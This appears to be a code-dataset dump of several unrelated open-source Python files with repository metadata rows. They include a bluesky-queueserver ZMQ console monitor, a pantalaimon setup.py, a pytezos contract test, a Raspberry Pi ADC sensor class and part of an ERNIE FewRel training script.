msg = self._msg_queue.get(block=True, timeout=self._polling_timeout)
self._publish(msg)
except Exception:
pass
if not self._thread_running: # Exit thread
break
def _publish(self, payload):
if self._console_output_on:
sys.__stdout__.write(payload["msg"])
sys.__stdout__.flush()
if self._zmq_publish_on and self._socket:
topic = self._zmq_topic
payload_json = json.dumps(payload)
self._socket.send_multipart([topic.encode("ascii"), payload_json.encode("utf8")])
class ReceiveConsoleOutput:
"""
The class allows to subscribe to published 0MQ messages and read the messages one by
one as they arrive. Subscription is performed using the remote 0MQ address and topic.
The class provides blocking (with timeout) ``recv()`` method that waits for the next
published message. The following example contains the code illustrating using the class.
In real-world application the loop will be running in a separate thread and generating
callbacks on each received message.
The ``subscribe()`` and ``unsubscribe()`` methods allow to explicitly subscribe and
unsubscribe the socket to the topic. The messages published while the socket is unsubscribed
are discarded. First call to ``recv()`` method automatically subscribes the socket.
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutput
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutput(zmq_subscribe_addr=zmq_subscribe_addr)
while True:
try:
payload = rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# Insert the code that needs to be executed on timeout (if any).
pass
# Place for the code that should be executed after receiving each
# message or after timeout (e.g. check a condition and exit
# the loop once the condition is satisfied).
Parameters
----------
zmq_subscribe_addr : str or None
Address of ZMQ server (PUB socket). If None, then the default address is
``tcp://localhost:60625`` is used.
zmq_topic : str
0MQ topic for console output. Only messages from this topic are going to be received.
timeout : int, float or None
Timeout for the receive operation in milliseconds. If `None`, then wait
for the message indefinitely.
"""
def __init__(self, *, zmq_subscribe_addr=None, zmq_topic=_default_zmq_console_topic, timeout=1000):
self._timeout = timeout # Timeout for 'recv' operation (ms)
zmq_subscribe_addr = zmq_subscribe_addr or default_zmq_info_address
logger.info("Subscribing to console output stream from 0MQ address: %s ...", zmq_subscribe_addr)
logger.info("Subscribing to 0MQ topic: '%s' ...", zmq_topic)
self._zmq_subscribe_addr = zmq_subscribe_addr
self._zmq_topic = zmq_topic
self._socket = None
self._socket_subscribed = False
if self._zmq_subscribe_addr:
context = zmq.Context()
self._socket = context.socket(zmq.SUB)
self._socket.connect(self._zmq_subscribe_addr)
def subscribe(self):
"""
Subscribe 0MQ socket to the console output topic. Once the socket is subscribed,
the published messages are cached by 0MQ and could be loaded with ``recv()`` method.
The function does nothing if the socket is already subscribed.
"""
if self._socket and not self._socket_subscribed:
self._socket.subscribe(self._zmq_topic)
self._socket_subscribed = True
def unsubscribe(self):
"""
Unsubscribe 0MQ socket from the console output topic. Once the socket is unsubscribed,
all published messages are discarded.
"""
if self._socket and self._socket_subscribed:
self._socket.unsubscribe(self._zmq_topic)
self._socket_subscribed = False
def recv(self, timeout=-1):
"""
Get the next published message. The function subscribes the socket to 0MQ topic
if the socket is not already subscribed. If timeout expires then ``TimeoutError``
is raised.
Parameters
----------
timeout : int, float or None
Timeout for the receive operation in milliseconds. If timeout is
a negative number (default), the timeout value passed to the class
constructor is used. If `None`, then wait indefinitely.
Returns
-------
dict
Received message. The dictionary contains timestamp (``time`` key)
and text message (``msg`` key).
Raises
------
TimeoutError
Timeout occurred. Timeout does not indicate communication error.
"""
if (timeout is not None) and (timeout < 0):
timeout = self._timeout
# Subscribe the socket to the topic if it is not already subscribed
self.subscribe()
if not self._socket.poll(timeout=timeout):
raise TimeoutError("No message received during timeout period {timeout} ms")
topic, payload_json = self._socket.recv_multipart()
payload_json = payload_json.decode("utf8", "strict")
payload = json.loads(payload_json)
return payload
def __del__(self):
self._socket.close()
class ReceiveConsoleOutputAsync:
"""
Async version of ``ReceiveConsoleOutput`` class. There are two ways to use the class:
explicitly awaiting for the ``recv`` function (same as in ``ReceiveConsoleOutput``)
or setting up a callback function (plain function or coroutine).
The ``subscribe()`` and ``unsubscribe()`` methods allow to explicitly subscribe and
unsubscribe the socket to the topic. The messages published while the socket is unsubscribed
are discarded. Calls to ``recv()`` and ``start()`` methods always subscribe the socket,
``stop()`` method unsubscribes the socket unless called with ``unsubscribe=False``.
Explicitly awaiting ``recv`` function:
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutputAsync
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutputAsync(zmq_subscribe_addr=zmq_subscribe_addr)
async def run_acquisition():
while True:
try:
payload = await rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# Insert the code that needs to be executed on timeout (if any).
pass
# Place for the code that should be executed after receiving each
# message or after timeout (e.g. check a condition and exit
# the loop once the condition is satisfied).
# Subscribe to start caching messages. Calling 'recv()' also subscribes the socket.
rco.subscribe()
asyncio.run(run_acquisition())
# Unsubscribe to discard all new messages
rco.unsubscribe()
Setting up callback function or coroutine (awaitable function):
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutputAsync
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutputAsync(zmq_subscribe_addr=zmq_subscribe_addr)
async def cb_coro(payload):
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
rco.set_callback(cb_coro)
async def run_acquisition():
rco.start()
# Do something useful here, e.g. sleep
asyncio.sleep(60)
rco.stop()
# Acquisition can be started and stopped multiple time if necessary
rco.start()
asyncio.sleep(60)
rco.stop()
asyncio.run(run_acquisition())
.. note::
If callback is a plain function, it is executed immediately after the message is received
and may potentially block the loop if it takes too long to complete (even occasionally).
If the callback is a coroutine, it is not awaited, but instead placed in the loop
(with ``ensure_future``), so acquisition of messages will continue. Typically the callback
will do a simple operation such as adding the received message to the queue.
Parameters
----------
zmq_subscribe_addr : str or None
Address of ZMQ server (PUB socket). If None, then the default address is
``tcp://localhost:60625`` is used.
zmq_topic : str
0MQ topic for console output. Only messages from this topic are going to be received.
timeout : int, float or None
Timeout for the receive operation in milliseconds. If `None`, then wait
for the message indefinitely.
"""
def __init__(self, *, zmq_subscribe_addr=None, zmq_topic=_default_zmq_console_topic, timeout=1000):
self._timeout = timeout # Timeout for 'recv' operation (ms)
zmq_subscribe_addr = zmq_subscribe_addr or "tcp://localhost:60625"
self._callback = None # Function that is awaited once a message is received from RE Manager
self._exit = False
self._is_running = False
logger.info("Subscribing to console output stream from 0MQ address: %s ...", zmq_subscribe_addr)
logger.info("Subscribing to 0MQ topic: '%s' ...", zmq_topic)
self._zmq_subscribe_addr = zmq_subscribe_addr
self._zmq_topic = zmq_topic
self._socket = None
self._socket_subscribed = False
self._unsubscribe_when_stopping = False
if self._zmq_subscribe_addr:
context = zmq.asyncio.Context()
self._socket = context.socket(zmq.SUB)
self._socket.connect(self._zmq_subscribe_addr)
def subscribe(self):
"""
Subscribe 0MQ socket to the console output topic. Once the socket is subscribed,
the published messages are cached by 0MQ and could be loaded with ``recv()`` method.
The function does nothing if the socket is already subscribed.
"""
if self._socket and not self._socket_subscribed:
self._socket.subscribe(self._zmq_topic)
self._socket_subscribed = True
def unsubscribe(self):
"""
Unsubscribe 0MQ socket from the console output topic. Once the socket is unsubscribed,
all published messages are discarded.
"""
if self._socket and self._socket_subscribed:
self._socket.unsubscribe(self._zmq_topic)
self._socket_subscribed = False
def set_callback(self, cb):
"""
Set callback function, which is called once for each received message. If ``cb`` is
a function, it is called immediately and execution of the loop is blocked until the
execution of the function is complete. If ``cb`` is coroutine, it is not awaited, but
instead placed in the loop using ``asyncio.ensure_future``. Only one callback function
can be set.
Parameters
----------
cb : callable, coroutine or None
Reference to a callback function or coroutine. The function signature is expected
to receive a message as a parameter (message is a dictionary with keys ``time`` and ``msg``)
and return ``None``. The function is expected to handle exceptions that are raised
internally. Pass ``None`` to clear callback (messages will be received and discarded).
"""
self._callback = cb
async def recv(self, timeout=-1):
"""
Get the next published message. If timeout expires then ``TimeoutError`` is raised.
If the socket is not subscribed to to topic, then subscribes the socket.
Parameters
----------
timeout : int, float or None
Timeout for the receive operation in milliseconds. If timeout is
a negative number (default), the timeout value passed to the class
constructor is used. If `None`, then wait indefinitely.
Returns
-------
dict
Received message. The dictionary contains timestamp (``time`` key)
and text message (``msg`` key).
Raises
------
TimeoutError
Timeout occurred. Timeout does not indicate communication error.
"""
if (timeout is not None) and (timeout < 0):
timeout = self._timeout
# Subscribe the socket to the topic if it is not already subscribed
self.subscribe()
if not await self._socket.poll(timeout=timeout):
raise TimeoutError("No message received during timeout period {timeout} ms")
topic, payload_json = await self._socket.recv_multipart()
payload_json = payload_json.decode("utf8", "strict")
payload = json.loads(payload_json)
return payload
async def _recv_next_message(self):
try:
payload = await self.recv()
if self._callback:
if inspect.iscoroutinefunction(self._callback):
asyncio.ensure_future(self._callback(payload))
else:
self._callback(payload)
except TimeoutError:
pass
except Exception as ex:
logger.exception(
"Exception occurred while while waiting for RE Manager console output message: %s", ex
)
if not self._exit:
asyncio.ensure_future(self._recv_next_message())
else:
if self._unsubscribe_when_stopping:
self.unsubscribe()
self._is_running = False
def start(self):
"""
Start collection of messages published by RE Manager. Collection may be started and stopped
multiple times during a session. Repeated calls to the ``start`` method are ignored.
The function MUST be called from the event loop. The method always subscribes the socket.
"""
self._exit = False
if not self._is_running:
self._is_running = True
self.subscribe()
asyncio.ensure_future(self._recv_next_message())
def stop(self, *, unsubscribe=True):
"""
Stop collection of messages published by RE Manager. Call to ``stop`` method unsubscribes
the client from 0MQ topic, therefore all the messages published until collection is started
are ignored. The function MUST be called from the event loop.
Parameters
----------
unsubscribe: boolean (optional)
Unsubscribe the socket if ``True`` (default), otherwise leave the socket subscribed.
"""
self._unsubscribe_when_stopping = unsubscribe
self._exit = True
def __del__(self):
self.stop()
if self._socket:
self._socket.close()
def qserver_console_monitor_cli():
"""
CLI tool for remote monitoring of console output from RE Manager. The function is also
expected to be used as an example of using ``ReceiveConsoleOutput`` class.
"""
logging.basicConfig(level=logging.WARNING)
logging.getLogger("bluesky_queueserver").setLevel("INFO")
def formatter(prog):
# Set maximum width such that printed help mostly fits in the RTD theme code block (documentation).
return argparse.RawDescriptionHelpFormatter(prog, max_help_position=20, width=90)
parser = argparse.ArgumentParser(
description="Queue Server Console Monitor:\nCLI tool for remote monitoring of console output "
f"published by RE Manager.\nbluesky-queueserver version {qserver_version}\n",
formatter_class=formatter,
)
parser.add_argument(
"--zmq-info-addr",
dest="zmq_info_addr",
type=str,
default=None,
help="The address of RE Manager socket used for publishing console output. The parameter overrides "
"the address set using QSERVER_ZMQ_INFO_ADDRESS environment variable. The default value is used "
"if the address is not set using the parameter or the environment variable. Address format: "
f"'tcp://127.0.0.1:60625' (default: {default_zmq_info_address}).",
)
parser.add_argument(
"--zmq-subscribe-addr",
dest="zmq_subscribe_addr",
type=str,
default=None,
help="The parameter is deprecated and will be removed. Use --zmq-info-addr instead.",
)
args = parser.parse_args()
zmq_info_addr = args.zmq_info_addr
if args.zmq_subscribe_addr is not None:
logger.warning(
"The parameter --zmq-subscribe-addr is deprecated and will be removed. Use --zmq-info-addr instead."
)
zmq_info_addr = zmq_info_addr or args.zmq_subscribe_addr
zmq_info_addr = zmq_info_addr or os.environ.get("QSERVER_ZMQ_INFO_ADDRESS", None)
zmq_info_addr = zmq_info_addr or default_zmq_info_address
try:
rco = ReceiveConsoleOutput(zmq_subscribe_addr=zmq_info_addr)
rco.subscribe()
while True:
try:
payload = rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None) # noqa: F841
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# There is no need to use or process timeouts. This code
# serves mostly as an example of how to use it.
pass
# Place for the code that should be executed after receiving each
# message or after timeout. (E.g. the code may check some condition
# and exit the loop once the condition is fulfilled.)
exit_code = 0 # The code is set if the loope is exited (which does not happen here)
except BaseException as ex:
logger.exception("Queue Server Console Monitor failed with exception: %s", str(ex))
exit_code = 1
return exit_code
| [
"[email protected]"
] | |
2c161ca9efa8d4b256b9cbf48c804dc8659b5b10 | 1086ef8bcd54d4417175a4a77e5d63b53a47c8cf | /Forks/uvapy-master/geometry/p10005.py | 22919427968cb78efca83f85a7629ab024461bf1 | [
"MIT"
] | permissive | wisdomtohe/CompetitiveProgramming | b883da6380f56af0c2625318deed3529cb0838f6 | a20bfea8a2fd539382a100d843fb91126ab5ad34 | refs/heads/master | 2022-12-18T17:33:48.399350 | 2020-09-25T02:24:41 | 2020-09-25T02:24:41 | 298,446,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,600 | py | from math import isclose
class Circle:
def __init__(self, **kwargs):
if "p1" in kwargs and "p2" in kwargs and "p3" in kwargs:
self.from_three_points(kwargs["p1"], kwargs["p2"], kwargs["p3"])
# elif "c" in kwargs and "r" in kwargs:
# self.from_center_radius(kwargs["c"], kwargs["r"])
else:
raise ValueError("Unknown constructor called: {}".format(kwargs.keys()))
def from_three_points(self, p1, p2, p3):
if isclose(p1.x, p2.x):
p3, p1= p1, p3
mr = (p2.y-p1.y) / (p2.x-p1.x)
if isclose(p2.x, p3.x):
p1, p2= p2, p1
mt = (p3.y-p2.y) / (p3.x-p2.x)
if isclose(mr, mt):
raise ValueError("No such circle exists.")
x = (mr*mt*(p3.y-p1.y) + mr*(p2.x+p3.x) - mt*(p1.x+p2.x)) / (2*(mr-mt))
y = (p1.y+p2.y)/2 - (x - (p1.x+p2.x)/2) / mr
radius = pow((pow((p2.x-x), 2) + pow((p2.y-y), 2)), 0.5)
self.c = (x, y)
self.r = radius
while True:
n = int(input())
if n == 0:
break
points = []
for i in range(n):
p = tuple(map(int, input().split()))
points.append(p)
r = float(input())
if n == 1:
# Always feasible to embed a point in a circle (r == 0?)
print("The polygon can be packed in the circle.")
elif n == 2:
dist_l2 = (points[1][0] - points[0][0]) ** 2 + (points[1][1] - points[0][1])**2
if dist_l2 <= (r+r)**2:
print("The polygon can be packed in the circle.")
else:
print("There is no way of packing that polygon.")
else:
# Find a circle that passes through first three points
c = Circle(p1 = points[0], p2 = points[1], p3 = points[2]) | [
"[email protected]"
] | |
1336aaa3cf00acaea477d1715361e818158c5ce9 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /TAhuay457cw5AekBe_5.py | 91d14e284af645ac11d85fa441299abdbfccac66 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py |
from re import sub
vowels = {"a", "e", "i", "o", "u", "A", "E", "I", "O", "U"}
def monkey_talk(txt):
return "{}.".format(sub(r"^[eo]", lambda m: m.group().upper(),
sub(r"[A-Za-z]+",
lambda m: "eek" if m.group()[0] in vowels
else "ook", txt)))
| [
"[email protected]"
] | |
1cedde77ae394ba32a9d083fb8ec824a480ef2c5 | 6974096eaf642a1c3dfbc4567d0f0776621261de | /setup.py | 2eea792aa201ef462b7a712aa3ca336ef13a4f22 | [
"Apache-2.0"
] | permissive | thrrgilag/pantalaimon | 29709e1231db7655e57685babad27094f68afe5c | d388a21b9b1f17b7f52790f79dd571d8e75a4543 | refs/heads/master | 2022-11-13T12:56:14.747072 | 2020-07-02T10:19:59 | 2020-07-02T10:19:59 | 277,380,106 | 0 | 0 | Apache-2.0 | 2020-07-05T20:41:57 | 2020-07-05T20:41:56 | null | UTF-8 | Python | false | false | 1,345 | py | # -*- coding: utf-8 -*-
from setuptools import find_packages, setup
with open("README.md", encoding="utf-8") as f:
long_description = f.read()
setup(
name="pantalaimon",
version="0.6.5",
url="https://github.com/matrix-org/pantalaimon",
author="The Matrix.org Team",
author_email="[email protected]",
description=("A Matrix proxy daemon that adds E2E encryption "
"capabilities."),
long_description=long_description,
long_description_content_type="text/markdown",
license="Apache License, Version 2.0",
packages=find_packages(),
install_requires=[
"attrs >= 19.3.0",
"aiohttp >= 3.6, < 4.0",
"appdirs >= 1.4.4",
"click >= 7.1.2",
"keyring >= 21.2.1",
"logbook >= 1.5.3",
"peewee >= 3.13.1",
"janus >= 0.5",
"cachetools >= 3.0.0"
"prompt_toolkit>2<4",
"typing;python_version<'3.5'",
"matrix-nio[e2e] >= 0.14, < 0.15"
],
extras_require={
"ui": [
"dbus-python <= 1.2",
"PyGObject <= 3.36",
"pydbus <= 0.6",
"notify2 <= 0.3",
]
},
entry_points={
"console_scripts": ["pantalaimon=pantalaimon.main:main",
"panctl=pantalaimon.panctl:main"],
},
zip_safe=False
)
| [
"[email protected]"
] | |
0a435d06d21f40db400cf199480df79d7c0e0d0f | dcc491dd2fa4ece68728255d236fa6e784eef92d | /modules/2.78/bpy/types/PythonController.py | a6975a4e8c4fe364b1b578e3084575a187be1d7d | [
"MIT"
] | permissive | cmbasnett/fake-bpy-module | a8e87d5a95d075e51133307dfb55418b94342f4f | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | refs/heads/master | 2020-03-14T16:06:29.132956 | 2018-05-13T01:29:55 | 2018-05-13T01:29:55 | 131,691,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | class PythonController:
mode = None
module = None
text = None
use_debug = None
| [
"[email protected]"
] | |
5699dafae03660ced229e5fb381de892c3f83a6d | c4f7b067dbf9efa404d446453cdf2b0839d33fe1 | /src/sensorrunner/devices/SPI/ADC/device.py | 48e20b4d57883c0fadef06f30a025389e38cda66 | [] | no_license | JackBurdick/sensorrunner | 90e05e35381363ad28301b0e28579372fd78c179 | 506772d2ec4887b3890e4555b66bf5548910d020 | refs/heads/master | 2023-07-02T18:26:21.418501 | 2021-02-22T02:27:04 | 2021-02-22T02:27:04 | 298,879,591 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,386 | py | from sensorrunner.devices.sensor.SPI.ADC.light.pt19 import PT19
from gpiozero import MCP3008, Device
# from gpiozero.pins.mock import MockFactory
from gpiozero.pins.native import NativeFactory
Device.pin_factory = NativeFactory()
class MDC3800:
def __init__(
self,
name,
# devices
devices_dict,
):
# NOTE: accepting tuples currently because I'm not sure what the config
# will look like yet
# "fn": None --> resort to default fn
self.ALLOWED_DEVICES = {"pt19": {"device_class": PT19, "fn": None}}
# connected = (name, address, channel, device, fn)
if devices_dict is None:
raise ValueError("no devices specified in `device_dict`")
# TODO: assure pins are valid/acceptable
# light = MCP3008(channel=0, clock_pin=11, mosi_pin=10, miso_pin=9,
# select_pin=8)
# TODO: ensure channel 0-8
channel_to_device = {}
devices = {}
for name, dd in devices_dict.items():
devices[name] = {}
cur_dev_class = self.ALLOWED_DEVICES[dd["device_type"]]["device_class"]
if dd["channel"] not in channel_to_device:
channel_to_device[dd["channel"]] = MCP3008(
channel=dd["channel"],
clock_pin=11,
mosi_pin=10,
miso_pin=9,
select_pin=8,
)
cur_device = channel_to_device[dd["channel"]]
cur_device_obj = cur_dev_class(cur_device)
# TODO: this really isn't a device_type but a device_object - same
# in I2C
devices[name]["device_type"] = cur_device_obj
available_fns = [
f
for f in dir(cur_device)
if callable(getattr(cur_device, f)) and not f.startswith("_")
]
try:
dev_fn = dd["fn_name"]
except KeyError:
dev_fn = None
if dev_fn is not None:
if dev_fn not in available_fns:
raise ValueError(
f"specified fn ({dev_fn}) for {name} not available for {cur_device}.\n"
f"please select from {available_fns}"
)
fn_name = dev_fn
else:
fn_name = "return_value"
try:
devices[name]["fn"] = getattr(devices[name]["device_type"], fn_name)
except KeyError:
raise ValueError(
f"specified fn ({fn_name}) for {name} not available for {cur_device}.\n"
f"please select from {available_fns}"
)
self.devices = devices
def return_value(self, name, params):
if name is None:
return ValueError(
f"no name specified. please select from {self.devices.keys()}"
)
if not isinstance(name, str):
return ValueError(f"`name` is expected to be type {str}, not {type(name)}")
try:
dev_d = self.devices[name]
except KeyError:
raise ValueError(
f"{name} is not available. please select from {self.devices.keys()}"
)
if params:
value = dev_d["fn"](**params)
else:
# TODO: try
value = dev_d["fn"]()
return value
@staticmethod
def build_task_params(device_name, device_dict):
"""
dist0 = Entry(
"run_dist_0",
"tasks.iic.tasks.dist_select",
schedule=celery.schedules.schedule(run_every=2),
kwargs={},
app=celery_app.app,
)
# name=None, task=None, schedule=None, kwargs, app
{
"env_a": {
"channel": 2,
"address": 114,
"device_type": "si7021",
"params": {"run": {"unit": "f"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
"dist_a": {
"channel": 0,
"address": 112,
"device_type": "vl53l0x",
"params": {"run": {"unit": "in"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
}
"""
DEFAULT_FN_NAME = "return_value"
entry_specs = {}
for comp_name, comp_dict in device_dict.items():
dev_dict = comp_dict.copy()
entry_d = {}
fn_name = comp_dict["fn_name"]
if fn_name is None:
fn_name = DEFAULT_FN_NAME
entry_d["name"] = f"{device_name}_{comp_name}_{fn_name}"
# TODO: make more robust
entry_d["task"] = "sensorrunner.tasks.devices.MDC3800.tasks.MDC3800_run"
# maybe make schedule outside this?
entry_d["run_every"] = comp_dict["params"]["schedule"]["frequency"]
if not isinstance(dev_dict, dict):
raise ValueError(
f"run params ({dev_dict}) expected to be type {dict}, not {type(dev_dict)}"
)
# add component name
dev_dict["name"] = comp_name
entry_d["kwargs"] = {"dev_dict": dev_dict}
entry_specs[comp_name] = entry_d
return entry_specs
| [
"[email protected]"
] | |
eb1babf920093b006230d7ec6c101e59b897093d | cf91f1a6354ba7a803af8382e0ef8bde6175845e | /tests/test_with.py | 1fd2a1f616ddef483c4ca7b17a027e7e1cd824b0 | [] | permissive | mueslo/python-progressbar | a230dc1be0af48015215d10a6b21e1d15005ccb4 | 5621a26b51cddc3ce3f2b62a9e32a28eb60a2f84 | refs/heads/master | 2022-11-10T18:23:08.242413 | 2020-06-25T19:36:56 | 2020-06-25T19:36:56 | 275,635,088 | 0 | 0 | BSD-3-Clause | 2020-06-28T17:29:57 | 2020-06-28T17:29:56 | null | UTF-8 | Python | false | false | 429 | py | import progressbar
def test_with():
with progressbar.ProgressBar(max_value=10) as p:
for i in range(10):
p.update(i)
def test_with_stdout_redirection():
with progressbar.ProgressBar(max_value=10, redirect_stdout=True) as p:
for i in range(10):
p.update(i)
def test_with_extra_start():
with progressbar.ProgressBar(max_value=10) as p:
p.start()
p.start()
| [
"[email protected]"
] | |
01fd76371431a37e8804b4f2de5e71eb488b3154 | 0e9f73d2ef1239b22e049ef6338362da7dbfb122 | /source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0097_auto_20190514_2147.py | 5d4d4dab7faf5ac58c7e11ed8ee2ae65fe9af49c | [] | no_license | Andy-Mason/FatQuants | 3c4bfafc29834af76b0be40e93b0e210e0ef5056 | edd0e98f4599ef91adbdf4179164769ddd66c62a | refs/heads/master | 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 745 | py | # Generated by Django 2.1.7 on 2019-05-14 20:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0096_auto_20190514_2147'),
]
operations = [
migrations.AddField(
model_name='ticker',
name='product_leverage',
field=models.FloatField(blank=True, db_column='product_leverage', null=True, verbose_name='Product Leverage'),
),
migrations.AddField(
model_name='ticker',
name='unit_type',
field=models.CharField(blank=True, choices=[('Acc', 'Accumulation'), ('Inc', 'Income')], db_column='unit_type', default='', max_length=3, verbose_name='Unit Type'),
),
]
| [
"[email protected]"
] | |
385053382cb462ca295e3ea3ca1df86b6ad1b044 | 99b2aff89dcec2f43cee32a6bdd4c0c43d6c51fa | /tests/contract_tests/growl_tdg_garden/test_growl_tdg_garden_pick_intial_id.py | 1782590265f597e5d879efb03aac96504f4f4d5d | [
"MIT"
] | permissive | baking-bad/pytezos | c4248bde49a5b05521b8cc51eeca588b1a721660 | 19747e3acec2141f06e812025673f497fc07e2d4 | refs/heads/master | 2023-07-06T21:57:09.572985 | 2023-07-05T11:45:27 | 2023-07-05T11:45:27 | 169,243,460 | 115 | 43 | MIT | 2023-07-04T16:28:09 | 2019-02-05T13:12:50 | Python | UTF-8 | Python | false | false | 1,885 | py | import json
from os.path import dirname
from os.path import join
from unittest import TestCase
from pytezos.michelson.forge import forge_micheline
from pytezos.michelson.forge import unforge_micheline
from pytezos.michelson.program import MichelsonProgram
folder = 'typed_minter'
entrypoint = 'mint_TYPED'
class MainnetOperationTestCaseGROWL_TDG_GARDEN(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'pick_intial_id.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'pick_intial_id'
cls.operation = operation
# cls.maxDiff = None
def test_parameters_growl_tdg_garden(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
# pprint(py_obj)
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_growl_tdg_garden(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_storage_diff = self.operation['lazy_storage_diff']
extended_storage = storage.merge_lazy_diff(lazy_storage_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
# pprint(py_obj)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
| [
"[email protected]"
] | |
8c2b88a90276e8878d80b2051ba69a0ae3c43a9d | 9f491494ad39b91c906517ceb3008c752c214989 | /NRE_paper_study/ERNIE/ERNIE/code/run_fewrel.py | 6cd39d87b03a062812499b41ae86f44523c8c782 | [
"MIT"
] | permissive | yuwell1999/nlp_paper_study | 0b73b2e8235a4dffc0fa5016c23d7998a15f58a7 | b7772aa9c15d3b8459d9b8c3addb93c575a93ef2 | refs/heads/master | 2022-04-15T22:01:45.526579 | 2020-04-07T14:24:27 | 2020-04-07T14:24:27 | 256,650,641 | 1 | 0 | null | 2020-04-18T02:07:02 | 2020-04-18T02:07:02 | null | UTF-8 | Python | false | false | 23,722 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import simplejson as json
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from knowledge_bert.tokenization import BertTokenizer
from knowledge_bert.modeling import BertForSequenceClassification
from knowledge_bert.optimization import BertAdam
from knowledge_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, input_ent, ent_mask, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.input_ent = input_ent
self.ent_mask = ent_mask
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_json(cls, input_file):
with open(input_file, "r", encoding='utf-8') as f:
return json.loads(f.read())
class FewrelProcessor(DataProcessor):
"""Processor for the CoLA data set (GLUE version)."""
def get_train_examples(self, data_dir):
"""See base class."""
examples = self._create_examples(
self._read_json(os.path.join(data_dir, "train.json")), "train")
labels = set([x.label for x in examples])
return examples, list(labels)
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "dev.json")), "dev")
def get_labels(self):
"""Useless"""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
guid = "%s-%s" % (set_type, i)
for x in line['ents']:
if x[1] == 1:
x[1] = 0
text_a = (line['text'], line['ents'])
label = line['label']
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
return examples
